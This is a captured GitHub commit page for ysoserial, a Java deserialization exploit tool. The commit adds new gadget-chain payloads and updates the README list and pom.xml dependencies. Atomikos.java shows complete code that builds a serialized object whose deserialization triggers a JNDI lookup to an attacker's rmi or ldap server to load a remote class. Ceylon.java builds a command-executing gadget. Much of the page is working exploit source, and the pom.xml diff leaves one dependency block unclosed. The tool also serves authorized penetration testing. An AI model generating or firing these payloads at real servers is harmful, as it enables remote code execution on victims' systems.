Skip to content

Commit

Permalink
New gadgets (#180)
Browse files Browse the repository at this point in the history 
* CommonsCollections8 payload (#116)

* New gadgets (Struts2JasperReports - Atomikos - SpringJta) (#123)

* added Atomikos gadget payload

* added Atomikos gadget payload

* naming

* added spring-jta gadget

* added strutsJasperReports gadget + tests

* updated deps list on springJta

* fixed authors

* renaming

* Add new payload in Commons Collections 3.2.1 (#125)

* Add Jython2 gadget (#135)

This version of Jython2 executes a command through os.system(). Based on Jython1 from @pwntester & @cschneider4711

Co-authored-by: Chris Frohoff <[email protected]>

* Add scala and clojure payloads from a couple of years ago (#137)

* Add some payloads for Scala

* Add new clojure payload effecting versions since 1.8.0

* Fix infinite loop behavior of clojure2 payload.

* add CommonsBeanutils2 (#163)

* ceylon gadget (#173)

Co-authored-by: navalorenzo <[email protected]>
Co-authored-by: Stefano Ciccone <[email protected]>
Co-authored-by: 梅子酒 <[email protected]>
Co-authored-by: Yorick Koster <[email protected]>
Co-authored-by: Ian Haken <[email protected]>
Co-authored-by: k4n5ha0 <[email protected]>
Co-authored-by: supersache <[email protected]>
  • Loading branch information
@frohoff @navalorenzo
@sciccone @meizjm3i @ykoster @JackOfMostTrades @k4n5ha0 @supersache
8 people authored Apr 27, 2022
1 parent bac4220 commit be6cbf7
Show file tree
Hide file tree
Showing 15 changed files with 847 additions and 42 deletions.
76 changes: 39 additions & 37 deletions README.md
View file
Original file line number Diff line number Diff line change
Expand Up @@ -43,44 +43,46 @@ are not responsible or liable for misuse of the software. Use responsibly.
```shell
$ java -jar ysoserial.jar
Y SO SERIAL?
Usage: java -jar ysoserial.jar [payload] '[command]'
Usage: java -jar ysoserial-[version]-all.jar [payload] '[command]'
Available payload types:
Payload Authors Dependencies
------- ------- ------------
AspectJWeaver @Jang aspectjweaver:1.9.2, commons-collections:3.2.2
BeanShell1 @pwntester, @cschneider4711 bsh:2.0b5
C3P0 @mbechler c3p0:0.9.5.2, mchange-commons-java:0.2.11
Click1 @artsploit click-nodeps:2.3.0, javax.servlet-api:3.1.0
Clojure @JackOfMostTrades clojure:1.8.0
CommonsBeanutils1 @frohoff commons-beanutils:1.9.2, commons-collections:3.1, commons-logging:1.2
CommonsCollections1 @frohoff commons-collections:3.1
CommonsCollections2 @frohoff commons-collections4:4.0
CommonsCollections3 @frohoff commons-collections:3.1
CommonsCollections4 @frohoff commons-collections4:4.0
CommonsCollections5 @matthias_kaiser, @jasinner commons-collections:3.1
CommonsCollections6 @matthias_kaiser commons-collections:3.1
CommonsCollections7 @scristalli, @hanyrax, @EdoardoVignati commons-collections:3.1
FileUpload1 @mbechler commons-fileupload:1.3.1, commons-io:2.4
Groovy1 @frohoff groovy:2.3.9
Hibernate1 @mbechler
Hibernate2 @mbechler
JBossInterceptors1 @matthias_kaiser javassist:3.12.1.GA, jboss-interceptor-core:2.0.0.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21
JRMPClient @mbechler
JRMPListener @mbechler
JSON1 @mbechler json-lib:jar:jdk15:2.4, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2, commons-lang:2.6, ezmorph:1.0.6, commons-beanutils:1.9.2, spring-core:4.1.4.RELEASE, commons-collections:3.1
JavassistWeld1 @matthias_kaiser javassist:3.12.1.GA, weld-core:1.1.33.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21
Jdk7u21 @frohoff
Jython1 @pwntester, @cschneider4711 jython-standalone:2.5.2
MozillaRhino1 @matthias_kaiser js:1.7R2
MozillaRhino2 @_tint0 js:1.7R2
Myfaces1 @mbechler
Myfaces2 @mbechler
ROME @mbechler rome:1.0
Spring1 @frohoff spring-core:4.1.4.RELEASE, spring-beans:4.1.4.RELEASE
Spring2 @mbechler spring-core:4.1.4.RELEASE, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2
URLDNS @gebl
Vaadin1 @kai_ullrich vaadin-server:7.7.14, vaadin-shared:7.7.14
Wicket1 @jacob-baines wicket-util:6.23.0, slf4j-api:1.6.4
Payload Authors Dependencies
------- ------- ------------
Atomikos @pwntester, @sciccone transactions-osgi:4.0.6, jta:1.1
BeanShell1 @pwntester, @cschneider4711 bsh:2.0b5
C3P0 @mbechler c3p0:0.9.5.2, mchange-commons-java:0.2.11
Clojure @JackOfMostTrades clojure:1.8.0
CommonsBeanutils1 @frohoff commons-beanutils:1.9.2, commons-collections:3.1, commons-logging:1.2
CommonsCollections1 @frohoff commons-collections:3.1
CommonsCollections2 @frohoff commons-collections4:4.0
CommonsCollections3 @frohoff commons-collections:3.1
CommonsCollections4 @frohoff commons-collections4:4.0
CommonsCollections5 @matthias_kaiser, @jasinner commons-collections:3.1
CommonsCollections6 @matthias_kaiser commons-collections:3.1
CommonsCollections7 @scristalli, @hanyrax, @EdoardoVignati commons-collections:3.1
FileUpload1 @mbechler commons-fileupload:1.3.1, commons-io:2.4
Groovy1 @frohoff groovy:2.3.9
Hibernate1 @mbechler
Hibernate2 @mbechler
JBossInterceptors1 @matthias_kaiser javassist:3.12.1.GA, jboss-interceptor-core:2.0.0.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21
JRMPClient @mbechler
JRMPListener @mbechler
JSON1 @mbechler json-lib:jar:jdk15:2.4, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2, commons-lang:2.6, ezmorph:1.0.6, commons-beanutils:1.9.2, spring-core:4.1.4.RELEASE, commons-collections:3.1
JavassistWeld1 @matthias_kaiser javassist:3.12.1.GA, weld-core:1.1.33.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21
Jdk7u21 @frohoff
Jython1 @pwntester, @cschneider4711 jython-standalone:2.5.2
MozillaRhino1 @matthias_kaiser js:1.7R2
MozillaRhino2 @_tint0 js:1.7R2
Myfaces1 @mbechler
Myfaces2 @mbechler
ROME @mbechler rome:1.0
Spring1 @frohoff spring-core:4.1.4.RELEASE, spring-beans:4.1.4.RELEASE
Spring2 @mbechler spring-core:4.1.4.RELEASE, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2
SpringJta @zerothoughts, @sciccone spring-tx:5.1.7.RELEASE, spring-context:5.1.7.RELEASE, jta:1.1
Struts2JasperReports @sciccone struts2-core:2.5.20, struts2-jasperreports-plugin:2.5.20
URLDNS @gebl
Vaadin1 @kai_ullrich vaadin-server:7.7.14, vaadin-shared:7.7.14
Wicket1 @jacob-baines wicket-util:6.23.0, slf4j-api:1.6.4

```

## Examples
Expand Down
41 changes: 38 additions & 3 deletions pom.xml
View file
Original file line number Diff line number Diff line change
Expand Up @@ -277,9 +277,9 @@
<version>1.7R2</version>
</dependency>
<dependency>
<groupId>javassist</groupId>
<artifactId>javassist</artifactId>
<version>3.12.0.GA</version>
<groupId>javassist</groupId>
<artifactId>javassist</artifactId>
<version>3.12.0.GA</version>
</dependency>
<dependency>
<groupId>org.jboss.weld</groupId>
Expand Down Expand Up @@ -326,6 +326,36 @@
<artifactId>vaadin-server</artifactId>
<version>7.7.14</version>
</dependency>
<dependency>
<groupId>org.scala-lang</groupId>
<artifactId>scala-library</artifactId>
<version>2.12.6</version>
<dependency>
<groupId>com.atomikos</groupId>
<artifactId>transactions-osgi</artifactId>
<version>4.0.6</version>
</dependency>
<dependency>
<groupId>org.springframework</groupId>
<artifactId>spring-tx</artifactId>
<version>5.1.7.RELEASE</version>
</dependency>
<dependency>
<groupId>org.springframework</groupId>
<artifactId>spring-context</artifactId>
<version>5.1.7.RELEASE</version>
</dependency>
<dependency>
<groupId>org.apache.struts</groupId>
<artifactId>struts2-core</artifactId>
<version>2.5.20</version>
</dependency>
<dependency>
<groupId>org.apache.struts</groupId>
<artifactId>struts2-jasperreports-plugin</artifactId>
<version>2.5.20</version>
</dependency>

<dependency>
<groupId>org.aspectj</groupId>
<artifactId>aspectjweaver</artifactId>
Expand All @@ -336,6 +366,11 @@
<artifactId>click-nodeps</artifactId>
<version>2.3.0</version>
</dependency>
<dependency>
<groupId>org.ceylon-lang</groupId>
<artifactId>ceylon.language</artifactId>
<version>1.3.3</version>
</dependency>
</dependencies>

<profiles>
Expand Down
77 changes: 77 additions & 0 deletions src/main/java/ysoserial/payloads/Atomikos.java
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,77 @@
package ysoserial.payloads;

import javax.management.BadAttributeValueExpException;

import com.atomikos.icatch.jta.RemoteClientUserTransaction;

import ysoserial.payloads.annotation.Authors;
import ysoserial.payloads.annotation.Dependencies;
import ysoserial.payloads.annotation.PayloadTest;
import ysoserial.payloads.util.PayloadRunner;
import ysoserial.payloads.util.Reflections;

/**
*
* Gadget chain:
*
* javax/management/BadAttributeValueExpException.readObject()
* com/atomikos/icatch/jta/RemoteClientUserTransaction.toString()
* com/atomikos/icatch/jta/RemoteClientUserTransaction.checkSetup()
* javax/naming/InitialContext.lookup()
*
*
* Arguments:
* - (rmi,ldap)://<attacker_server>[:<attacker_port>]/<classname>
*
*
* @author pwntester
* payload added by sciccone
*
* This gadget chain was also discovered by pwntester:
* https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-JSON-Attacks-wp.pdf
*
*/
@PayloadTest(harness="ysoserial.test.payloads.JRMPReverseConnectTest")
@Dependencies( { "com.atomikos:transactions-osgi:4.0.6", "javax.transaction:jta:1.1" } )
@Authors({ Authors.PWNTESTER, Authors.SCICCONE })
public class Atomikos implements ObjectPayload<Object> {

@Override
public Object getObject(String command) throws Exception {

// validate command
int sep = command.lastIndexOf('/');
if ( sep < 0 || (!command.startsWith("ldap") && !command.startsWith("rmi")))
throw new IllegalArgumentException("Command format is: " + command
+ "(rmi,ldap)://<attacker_server>[:<attacker_port>]/<classname>");

String url = command.substring(0, sep);
String className = command.substring(sep + 1);

// create factory based on url
String initialContextFactory;
if (url.startsWith("ldap"))
initialContextFactory = "com.sun.jndi.ldap.LdapCtxFactory";
else
initialContextFactory = "com.sun.jndi.rmi.registry.RegistryContextFactory";

// create object
RemoteClientUserTransaction rcut = new RemoteClientUserTransaction();

// set values using reflection
Reflections.setFieldValue(rcut, "initialContextFactory", initialContextFactory);
Reflections.setFieldValue(rcut, "providerUrl", url);
Reflections.setFieldValue(rcut, "userTransactionServerLookupName", className);

// create exception
BadAttributeValueExpException exception = new BadAttributeValueExpException(null);
Reflections.setFieldValue(exception, "val", rcut);

return exception;
}


public static void main ( final String[] args ) throws Exception {
PayloadRunner.run(Atomikos.class, args);
}
}
23 changes: 23 additions & 0 deletions src/main/java/ysoserial/payloads/Ceylon.java
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,23 @@
package ysoserial.payloads;

import com.redhat.ceylon.compiler.java.language.SerializationProxy;

import ysoserial.payloads.annotation.Authors;
import ysoserial.payloads.annotation.Dependencies;
import ysoserial.payloads.util.Gadgets;

@Authors({ Authors.KULLRICH })
@Dependencies({ "org.ceylon-lang:ceylon.language:1.3.3" })
public class Ceylon implements ObjectPayload<Object>
{

//
// Probably the simplest deser gadget ever ;-)
//
@Override
public Object getObject(String command) throws Exception {
final Object templates = Gadgets.createTemplatesImpl(command);

return new SerializationProxy (templates, templates.getClass(), "getOutputProperties");
}
}
Loading

0 comments on commit be6cbf7

Please sign in to comment.